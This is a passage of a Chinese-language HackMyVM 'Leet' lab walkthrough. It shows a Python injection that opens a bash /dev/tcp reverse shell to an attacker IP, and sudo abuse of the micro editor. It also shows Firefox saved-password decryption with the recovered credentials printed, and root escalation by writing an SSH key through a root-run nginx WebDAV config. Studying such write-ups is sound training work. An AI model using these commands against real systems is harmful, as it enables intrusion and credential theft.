src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701180327809\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u63d0\u53d6shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911426.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701180852578\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">__import__(&#039;os&#039;).popen(&#039;whoami&#039;).read();\n__import__(&#039;os&#039;).system(&#039;bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/192.168.0.143\/1234 0&gt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911427.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701181425747\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>micro\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/opt\/project$ cd ~\n(remote) www-data@leet.hmv:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 14 21:00 .\ndrwxr-xr-x 12 root root 4096 Feb 12 11:27 ..\ndrwxr-xr-x  2 root root 4096 Feb 14 21:00 html\n(remote) www-data@leet.hmv:\/var\/www$ cd html\n(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -l\nMatching Defaults entries for www-data on leet:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser www-data may run the following commands on leet:\n    (riva) NOPASSWD: \/usr\/bin\/micro\n(remote) www-data@leet.hmv:\/var\/www\/html$ file \/usr\/bin\/micro\n\/usr\/bin\/micro: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, Go BuildID=ZGN4-PEgidp0GQFC2DhN\/npFl-ZmzE1stSjkF3ozz\/9KOuVtA_3CSCIt1HL-lM\/Huh9eaBrgytFpqcC9L-9, stripped\n(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u rive \/usr\/bin\/micro\nsudo: unknown user rive\nsudo: error initializing audit plugin sudoers_audit<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u4e00\u6b3e\u7f16\u8f91\u5668\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911428.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701181844485\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ \/usr\/bin\/micro -h\nUsage: micro [OPTIONS] [FILE]...\n-clean\n        Cleans the configuration directory\n-config-dir dir\n        Specify a custom location for the configuration directory\n[FILE]:LINE:COL (if the `parsecursor` option is enabled)\n+LINE:COL\n        Specify a line and column to start the cursor at when opening a buffer\n-options\n        Show all option help\n-debug\n        Enable debug mode (enables logging to .\/log.txt)\n-version\n        Show the version number and information\n\nMicro&#039;s plugin&#039;s can be managed at the command line with the following commands.\n-plugin install [PLUGIN]...\n        Install plugin(s)\n-plugin remove [PLUGIN]...\n        Remove plugin(s)\n-plugin update [PLUGIN]...\n        Update plugin(s) (if no argument is given, updates all plugins)\n-plugin search [PLUGIN]...\n        Search for a plugin\n-plugin list\n        List installed plugins\n-plugin available\n        List available plugins\n\nMicro&#039;s options can also be set via command line arguments for quick\nadjustments. For real configuration, please use the settings.json\nfile (see &#039;help options&#039;).\n\n-option value\n        Set `option` to `value` for this session\n        For example: `micro -syntax off file.c`\n\nUse `micro -options` to see the full list of configuration options<\/code><\/pre>\n<p>\u53bb\u5b98\u7f51\u7ffb\u6587\u6863\uff0c\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911429.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911429.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701182504624\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u riva \/usr\/bin\/micro\nctrl+b \n$ \/bin\/bash\nriva@leet:\/var\/www\/html$ <\/code><\/pre>\n<blockquote>\n<p>\u8fd9\u91cc\u7684ctrl+b\u5bf9\u5e94\u7684\u56fe\u7247\u6709\u95ee\u9898\uff0c\u6211\u5f53\u521d\u662f\u5148\u8bd5\u51fa\u6765ctrl+b\u7684\uff0c\u540e\u6765\u627e\u6587\u6863\u4f30\u8ba1\u627e\u9519\u4e86\uff0c\u8c22\u8c22\u5c0f\u821f\u5e08\u5085\u7684\u6307\u6b63\uff0c\u8fd9\u91cc\u7684\u6587\u6863\u5b9e\u9645\u4e0a\u662f\u901a\u8fc7\u5148\u8fdb\u5165micro\u518d\u6267\u884cctrl+e\u6700\u540ehelp keybindings\u53ef\u4ee5\u627e\u5230\u7684\uff0c\u5b9e\u9645\u4e0actrl+b\u662f\u4e00\u79cdshell\u6a21\u5f0f\uff0c\u800cctrl+e\u662f\u4e00\u79cd\u547d\u4ee4\u683c\u5f0f\uff0c\u5728\u666e\u901a\u6587\u6863\u4e2d\u5c31\u53ef\u4ee5\u67e5\u5230\u4e86\uff1a<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407091142529.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407091142529.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701182504624\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>firefox\u5bc6\u7801\u63d0\u53d6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u riva \/usr\/bin\/micro\nriva@leet:\/var\/www\/html$ cd ~\nriva@leet:~$ ls -la\ntotal 40\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 3 root root 4096 Feb 14 21:00 ..\nlrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout\n-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla\n-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile\ndrwx------ 2 riva riva 4096 Feb 14 21:00 .ssh\n-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt\nriva@leet:~$ cat user.txt \n3a5cf7b35876169c280229c213ed63c1\nriva@leet:~$ sudo -l\n[sudo] password for riva: \nSorry, try again.\n[sudo] password for riva: \nsudo: 1 incorrect password attempt\nriva@leet:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nriva:x:1000:1000:,,,:\/home\/riva:\/bin\/bash\nriva@leet:~$ ls -la \/etc\/shadow\n-rw-r----- 1 root shadow 779 Feb 11 15:57 \/etc\/shadow\nriva@leet:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/chfn\nriva@leet:~$ ls -la\ntotal 40\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 3 root root 4096 Feb 14 21:00 ..\nlrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout\n-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config\ndrwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla\n-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile\ndrwx------ 2 riva riva 4096 Feb 14 21:00 .ssh\n-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt\nriva@leet:~$ cd .mozilla\/\nriva@leet:~\/.mozilla$ ls -la\ntotal 16\ndrwx------ 4 riva riva 4096 Feb 14 21:00 .\ndrwxr-xr-x 6 riva riva 4096 Feb 14 21:00 ..\ndrwx------ 2 riva riva 4096 Feb 14 21:00 extensions\ndrwx------ 6 riva riva 4096 Feb 14 21:00 firefox\nriva@leet:~\/.mozilla$ cd firefox\/\nriva@leet:~\/.mozilla\/firefox$ ls -la\ntotal 32\ndrwx------  6 riva riva 4096 Feb 14 21:00  .\ndrwx------  4 riva riva 4096 Feb 14 21:00  ..\ndrwx------  3 riva riva 4096 Feb 14 21:00 &#039;Crash Reports&#039;\ndrwx------ 16 riva riva 4096 Feb 14 21:00  guu30cui.default-esr\n-rw-r--r--  1 riva riva   58 Feb 14 21:00  installs.ini\ndrwx------  2 riva riva 4096 Feb 14 21:00 &#039;Pending Pings&#039;\n-rw-r--r--  1 riva riva  247 Feb 14 21:00  profiles.ini\ndrwx------  2 riva riva 4096 Feb 14 21:00  zbznfk37.default\nriva@leet:~\/.mozilla\/firefox$ pwd\n\/home\/riva\/.mozilla\/firefox\nriva@leet:~\/.mozilla\/firefox$ cd \/tmp\nriva@leet:\/tmp$ vim firefox_decrypt.py\nbash: vim: command not found\nriva@leet:\/tmp$ vi firefox_decrypt.py\nriva@leet:\/tmp$ chmod +x firefox_decrypt.py \nriva@leet:\/tmp$ python -V\nbash: python: command not found\nriva@leet:\/tmp$ python3 -V\nPython 3.11.2\nriva@leet:\/tmp$ python3 firefox_decrypt.py \nSelect the Mozilla profile you wish to decrypt\n1 -&gt; zbznfk37.default\n2 -&gt; guu30cui.default-esr\n1\n2024-07-01 12:35:59,994 - ERROR - Couldn&#039;t initialize NSS, maybe &#039;\/home\/riva\/.mozilla\/firefox\/zbznfk37.default&#039; is not a valid profile?\nriva@leet:\/tmp$ python3 firefox_decrypt.py \nSelect the Mozilla profile you wish to decrypt\n1 -&gt; zbznfk37.default\n2 -&gt; guu30cui.default-esr\n2\n\nWebsite:   chrome:\/\/FirefoxAccounts\nUsername: &#039;1db9561103ca4adc9afa6357c0a0b554&#039;\nPassword: &#039;{&quot;version&quot;:1,&quot;accountData&quot;:{&quot;scopedKeys&quot;:{&quot;https:\/\/identity.mozilla.com\/apps\/oldsync&quot;:{&quot;kid&quot;:&quot;1603273389635-IxsZ6HpGK9fL9tUfdcBqwA&quot;,&quot;k&quot;:&quot;Q8lFF-E91kvogabSQ2yjKj7k2JHX30UDeHEriaxaCY5slUVmtQvP-e3is5GxBiUKkG3g4dQLbFRsVOYeMkjNpg&quot;,&quot;kty&quot;:&quot;oct&quot;},&quot;sync:addon_storage&quot;:{&quot;kid&quot;:&quot;1603273389635-Ng9dJrdpVFqEoBs-R3LaTMKTiSWhWypqfmg9MJDby4U&quot;,&quot;k&quot;:&quot;L8MGJk3tWVlmN9Sm-MmdauxuQ38fIl--NziTjg_AmjO51_-vHo70OELMwif8kqn2zE3Yqg30BLw1ndNplRzGCA&quot;,&quot;kty&quot;:&quot;oct&quot;}},&quot;kSync&quot;:&quot;43c94517e13dd64be881a6d2436ca32a3ee4d891d7df450378712b89ac5a098e6c954566b50bcff9ede2b391b106250a906de0e1d40b6c546c54e61e3248cda6&quot;,&quot;kXCS&quot;:&quot;231b19e87a462bd7cbf6d51f75c06ac0&quot;,&quot;kExtSync&quot;:&quot;2fc306264ded59596637d4a6f8c99d6aec6e437f1f225fbe3738938e0fc09a33b9d7ffaf1e8ef43842ccc227fc92a9f6cc4dd8aa0df404bc359dd369951cc608&quot;,&quot;kExtKbHash&quot;:&quot;360f5d26b769545a84a01b3e4772da4cc2938925a15b2a6a7e683d3090dbcb85&quot;}}&#039;\n\nWebsite:   http:\/\/leet.hmv\nUsername: &#039;riva&#039;\nPassword: &#039;PGH$2r0co3L5QL&#039;\n\nWebsite:   https:\/\/hackmyvm.eu\nUsername: &#039;riva&#039;\nPassword: &#039;lovelove80&#039;<\/code><\/pre>\n<p>\u4e2d\u95f4\u4f7f\u7528\u7684\u5de5\u5177\u662f\uff1a<a href=\"https:\/\/github.com\/unode\/firefox_decrypt\">https:\/\/github.com\/unode\/firefox_decrypt<\/a><\/p>\n<h3>nginx\u63d0\u6743<\/h3>\n<p>\u5f97\u5230\u5bc6\u7801\u4ee5\u540e\uff0c\u53d1\u73b0root\u6743\u9650\u7684nginx\uff0c\u53c2\u8003https:\/\/gist.github.com\/DylanGrl\/ab497e2f01c7d672a80ab9561a903406\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">riva@leet:\/tmp$ cd ~\nriva@leet:~$ sudo -l\n[sudo] password for riva: \nSorry, try again.\n[sudo] password for riva: \nMatching Defaults entries for riva on leet:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser riva may run the following commands on leet:\n    (root) \/usr\/sbin\/nginx<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5229\u7528\u4e0b\u5c5e\u811a\u672c\u4fee\u6539\u914d\u7f6e\u6587\u4ef6\uff0c\u518dput\u4e0a\u4f20\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">riva@leet:~$ cd \/tmp\nriva@leet:\/tmp$ cat &lt;&lt; EOF &gt; \/tmp\/nginx_pwn.conf\nuser root;\nworker_processes 4;\npid \/tmp\/nginx.pid;\nevents {\n        worker_connections 768;\n}\nhttp {\n        server {\n                listen 1339;\n                root \/;\n                autoindex on;\n                dav_methods PUT;\n        }\n}\nEOF\nriva@leet:\/tmp$ cat \/tmp\/nginx_pwn.conf\nuser root;\nworker_processes 4;\npid \/tmp\/nginx.pid;\nevents {\n        worker_connections 768;\n}\nhttp {\n        server {\n                listen 1339;\n                root \/;\n                autoindex on;\n                dav_methods PUT;\n        }\n}\nriva@leet:\/tmp$ sudo -l\nMatching Defaults entries for riva on leet:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser riva may run the following commands on leet:\n    (root) \/usr\/sbin\/nginx\nriva@leet:\/tmp$ sudo -u root nginx -c \/tmp\/nginx_pwn.conf\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)\n2024\/07\/01 12:45:40 [emerg] 809#809: still could not bind()\nriva@leet:\/tmp$ ssh-keygen\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/riva\/.ssh\/id_rsa): root_shell\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in root_shell\nYour public key has been saved in root_shell.pub\nThe key fingerprint is:\nSHA256:Vdg6wvnm+W39eeMRnIhdAO1PGITfYzf+8b2\/PzBZBIw riva@leet.hmv\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|           +O+.  |\n|          .E.+.. |\n|       . ...o =. |\n|        +.o o++Bo|\n|        So o oB++|\n|          o  + +.|\n|         o .  oo=|\n|          o  ..oO|\n|           ...o=&amp;|\n+----[SHA256]-----+\nriva@leet:\/tmp$ cat root_shell.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR\/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o\/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4\/hNVU5W\/DnUh5IDPSpQH\/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv\nriva@leet:\/tmp$ curl -X PUT localhost:1339\/root\/.ssh\/authorized_keys -d &quot;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR\/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o\/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4\/hNVU5W\/DnUh5IDPSpQH\/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv&quot;\nriva@leet:\/tmp$ ssh root@0.0.0.0 -i root_shell \nLinux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue May 28 17:37:49 2024 from 192.168.0.178\nroot@leet:~# cat root\ncat: root: No such file or directory\nroot@leet:~# ls\nindex.html  r007_fl46.7x7  troll.jpg\nroot@leet:~# cat r007_fl46.7x7\nca169772acb099a02ebab8da1d9070ea<\/code><\/pre>\n<p>\u63a5\u7740\u627e\u5230\u4e86\u4e00\u4e2a\u5f69\u86cb\uff1a<\/p>\n<pre><code class=\"language-bash\">root@leet:~# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.143 - - [01\/Jul\/2024 12:49:27] &quot;GET \/troll.jpg HTTP\/1.1&quot; 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ wget http:\/\/192.168.0.165:8888\/troll.jpg            \n--2024-07-01 06:48:59--  http:\/\/192.168.0.165:8888\/troll.jpg\nConnecting to 192.168.0.165:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 47428 (46K) [image\/jpeg]\nSaving to: \u2018troll.jpg\u2019\n\ntroll.jpg                            100%[=====================================================================&gt;]  46.32K  --.-KB\/s    in 0.02s   \n\n2024-07-01 06:48:59 (1.95 MB\/s) - \u2018troll.jpg\u2019 saved [47428\/47428]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911430.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701185059438\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u989d\u5916\u63a2\u7d22<\/h2>\n<p>\u6211\u5bf9\u524d\u9762\u7684\u90a3\u4e9b\u4e0b\u8f7d\u4e0d\u4e0b\u6765\u7684\u6587\u4ef6\u8fd8\u662f\u6709\u4e9b\u803f\u803f\u4e8e\u6000\uff0c\u5c1d\u8bd5\u63a2\u7d22\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">root@leet:~# cd \/tmp\nroot@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/linpeas.sh\n--2024-07-01 12:59:06--  http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh.1\u2019\n\nlinpeas.sh.1                         100%[=====================================================================&gt;] 840.38K  --.-KB\/s    in 0.03s   \n\n2024-07-01 12:59:07 (29.1 MB\/s) - \u2018linpeas.sh.1\u2019 saved [860549\/860549]\n\nroot@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/pspy64\n--2024-07-01 12:59:13--  http:\/\/192.168.0.143:8888\/pspy64\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4468984 (4.3M) [application\/octet-stream]\nSaving to: \u2018pspy64.1\u2019\n\npspy64.1                             100%[=====================================================================&gt;]   4.26M  --.-KB\/s    in 0.1s    \n\n2024-07-01 12:59:13 (31.2 MB\/s) - \u2018pspy64.1\u2019 saved [4468984\/4468984]\n\nroot@leet:\/tmp# chmod +x *\nroot@leet:\/tmp# .\/linpeas.sh<\/code><\/pre>\n<p>linpeas.sh \u6211\u968f\u4fbf\u770b\u4e86\u4e00\u4e0b\u6ca1\u5565\u5947\u602a\u7684\u4e1c\u897f\uff0c\u5b9a\u65f6\u4efb\u52a1\u4e0d\u6e05\u695a\uff0cpspy64\u8fd0\u884c\u5f02\u5e38\uff0c\u7136\u540e\u627e\u7fa4\u4e3b\u501f\u4e86\u4e00\u4e2a\uff1a<\/p>\n<pre><code 